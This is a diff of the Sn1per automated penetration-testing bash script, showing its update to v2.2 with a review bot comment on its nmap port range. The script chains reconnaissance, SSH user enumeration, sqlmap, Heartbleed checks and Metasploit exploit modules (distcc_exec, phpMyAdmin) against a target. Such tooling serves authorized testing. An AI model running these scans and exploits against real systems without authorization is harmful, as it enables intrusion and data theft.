echo -e "$OKGREEN + -- ----------------------------=[Done!]=----------------------------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Done!]=----------------------------------- -- +$RESET"
loot
echo -e "" echo -e ""
echo -e "" echo -e ""
echo -e "" echo -e ""
@@ -467,7 +588,7 @@ echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET" echo -e "$OKRED /_/ $RESET"
echo -e "$RESET" echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com" echo -e "$OKORANGE + -- --=[http://crowdshield.com"
echo -e "$OKORANGE + -- --=[sn1per v2.0 by 1N3" echo -e "$OKORANGE + -- --=[sn1per v2.2 by 1N3"
echo -e "$RESET" echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET"
nslookup $TARGET nslookup $TARGET
@@ -483,14 +604,27 @@ then
echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET"
dig -x $TARGET dig -x $TARGET
dnsenum $TARGET dnsenum $TARGET
mv -f *_ips.txt $LOOT_DIR/ 2>/dev/null mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET"
python Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
echo ""
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
echo -e "$OKRED + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +$RESET"
echo -e "$OKBLUE"
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
echo -e "$OKRED [+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-crt.txt"
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
rm -f /tmp/curl.out 2> /dev/null
echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET"
for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done; for a in `cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null`; do dig $a CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done;
echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET"
python SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null python $PLUGINS_DIR/SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null
fi fi
echo "" echo ""
echo -e "$OKGREEN + -- ----------------------------=[Pinging host]=---------------------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Pinging host]=---------------------------- -- +$RESET"
@@ -498,7 +632,7 @@ ping -c 1 $TARGET
echo "" echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET"
if [ -z "$OPT1" ]; then if [ -z "$OPT1" ]; then
nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1433,1524,2049,2121,3306,3310,3389,3632,4443,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152,U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET
elif [ "$OPT1" == "web" ]; then elif [ "$OPT1" == "web" ]; then
@@ -542,6 +676,7 @@ port_3306=`grep 'portid="3306"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_3310=`grep 'portid="3310"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_3310=`grep 'portid="3310"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_3389=`grep 'portid="3389"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_3632=`grep 'portid="3632"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_3632=`grep 'portid="3632"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_4443=`grep 'portid="4443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_5432=`grep 'portid="5432"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_5800=`grep 'portid="5800"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_5800=`grep 'portid="5800"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_5900=`grep 'portid="5900"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
@@ -569,9 +704,9 @@ then
echo -e "$OKRED + -- --=[Port 22 closed... skipping.$RESET" echo -e "$OKRED + -- --=[Port 22 closed... skipping.$RESET"
else else
echo -e "$OKORANGE + -- --=[Port 22 opened... running tests...$RESET" echo -e "$OKORANGE + -- --=[Port 22 opened... running tests...$RESET"
cd ssh-audit cd $PLUGINS_DIR/ssh-audit
python ssh-audit.py $TARGET:22 python ssh-audit.py $TARGET:22
cd .. cd $INSTALL_DIR
nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;" msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
fi fi
@@ -642,6 +777,9 @@ else
echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE" echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I -X TRACE http://$TARGET | grep TRACE | tail -n 10 curl -s --insecure -I -X TRACE http://$TARGET | grep TRACE | tail -n 10
echo "" echo ""
echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
curl -s --insecure http://$TARGET | egrep -i meta --color=auto | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE" echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
curl -s --insecure -x http://$TARGET:80 -L http://crowdshield.com/.testing/openproxy.txt | tail -n 10 curl -s --insecure -x http://$TARGET:80 -L http://crowdshield.com/.testing/openproxy.txt | tail -n 10
echo "" echo ""
@@ -697,8 +835,13 @@ else
echo "" echo ""
python $CMSMAP -t http://$TARGET/wordpress/ python $CMSMAP -t http://$TARGET/wordpress/
echo "" echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running Uniscan Web Vulnerability Scan]=-- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
uniscan -u http://$TARGET -qweds mkdir -p $INSTALL_DIR/loot/web/$TARGET-http/ 2> /dev/null
arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-http/ --output-only-positives http://$TARGET
cd $INSTALL_DIR/loot/web/$TARGET-http/
arachni_reporter $INSTALL_DIR/loot/web/$TARGET-http/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-http/arachni.zip
unzip $INSTALL_DIR/loot/web/$TARGET-http/arachni.zip
cd $INSTALL_DIR
echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a sqlmap -u "http://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
@@ -820,6 +963,9 @@ else
echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE" echo -e "$OKBLUE+ -- --=[Checking if TRACE method is enabled on $TARGET...$RESET $OKORANGE"
curl -s --insecure -I -X TRACE https://$TARGET | grep TRACE curl -s --insecure -I -X TRACE https://$TARGET | grep TRACE
echo "" echo ""
echo -e "$OKBLUE+ -- --=[Checking for META tags on $TARGET...$RESET $OKORANGE"
curl -s --insecure https://$TARGET | egrep -i meta --color=auto | tail -n 10
echo ""
echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE" echo -e "$OKBLUE+ -- --=[Checking for open proxy on $TARGET...$RESET $OKORANGE"
curl -x https://$TARGET:443 -L https://crowdshield.com/.testing/openproxy.txt -s --insecure | tail -n 10 curl -x https://$TARGET:443 -L https://crowdshield.com/.testing/openproxy.txt -s --insecure | tail -n 10
echo "" echo ""
@@ -873,8 +1019,18 @@ else
echo "" echo ""
python $CMSMAP -t https://$TARGET/wordpress/ python $CMSMAP -t https://$TARGET/wordpress/
echo "" echo ""
echo -e "$OKGREEN + -- ----------------------------=[Running Uniscan Web Vulnerability Scan]=-- -- +$RESET" if [ $ARACHNI == "1" ];
uniscan -u https://$TARGET -qweds then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Arachni Scan]=------------------- -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Running Arachni Web Application Scan]=---- -- +$RESET"
mkdir -p $INSTALL_DIR/loot/web/$TARGET-https/ 2> /dev/null
arachni --report-save-path=$INSTALL_DIR/loot/web/$TARGET-https/ --output-only-positives https://$TARGET
cd $INSTALL_DIR/loot/web/$TARGET-https/
arachni_reporter $INSTALL_DIR/loot/web/$TARGET-https/*.afr --report=html:outfile=$INSTALL_DIR/loot/web/$TARGET-https/arachni.zip
unzip $INSTALL_DIR/loot/web/$TARGET-https/arachni.zip
cd $INSTALL_DIR
fi
echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running SQLMap SQL Injection Scan]=------- -- +$RESET"
sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a sqlmap -u "https://$TARGET" --batch --crawl=5 --level 1 --risk 1 -f -a
echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Running PHPMyAdmin Metasploit Exploit]=--- -- +$RESET"
@@ -1006,6 +1162,26 @@ else
msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;" msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
fi fi
if [ -z "$port_8443" ];
then
echo -e "$OKRED + -- --=[Port 4443 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 4443 opened... running tests...$RESET"
wafw00f http://$TARGET:4443
echo ""
whatweb http://$TARGET:4443
echo ""
xsstracer $TARGET 4443
sslscan --no-failed $TARGET:4443
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:4443
cd $PLUGINS_DIR/MassBleed
./massbleed $TARGET port 4443
cd $INSTALL_DIR
nikto -h https://$TARGET:4443
cutycapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg
nmap -A -p 4443 -T5 --script=*proxy* $TARGET
fi
if [ -z "$port_5432" ]; if [ -z "$port_5432" ];
then then
echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET" echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET"
@@ -1182,6 +1358,13 @@ cd $PLUGINS_DIR/yasuo
ruby yasuo.rb -r $TARGET -b all ruby yasuo.rb -r $TARGET -b all
cd $SNIPER_DIR cd $SNIPER_DIR
if [ "$FULLNMAPSCAN" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +$RESET"
nmap -T4 -sV -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
fi
if [ "$AUTOBRUTE" = "0" ]; then if [ "$AUTOBRUTE" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Brute Force]=-------------------- -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Skipping Brute Force]=-------------------- -- +$RESET"
else else
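Review bot: The range in `nmap -T4 -sV -O -v -p 1-65355 $TARGET ...` stops 180 ports short of the last TCP port, so 65356–65535 are never scanned although the banner says "Full NMap Port Scan"; it should be `-p 1-65535` (or `-p-`). The scan also writes to the same `$LOOT_DIR/nmap/nmap-$TARGET.xml` the quick scan produced and the `port_*` greps read from, replacing rather than extending those results; if that is intended it deserves a comment such as `# overwrites the quick-scan XML; the port_* checks above have already consumed it`, otherwise use a distinct filename. `$TARGET` and `$LOOT_DIR` remain unquoted here as in the rest of the file.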
@@ -1192,6 +1375,8 @@ else
rm -f scan.log rm -f scan.log
echo "" echo ""
fi fi
loot
rm -f $LOOT_DIR/.fuse_* 2> /dev/null
echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET" echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
exit 0 exit 0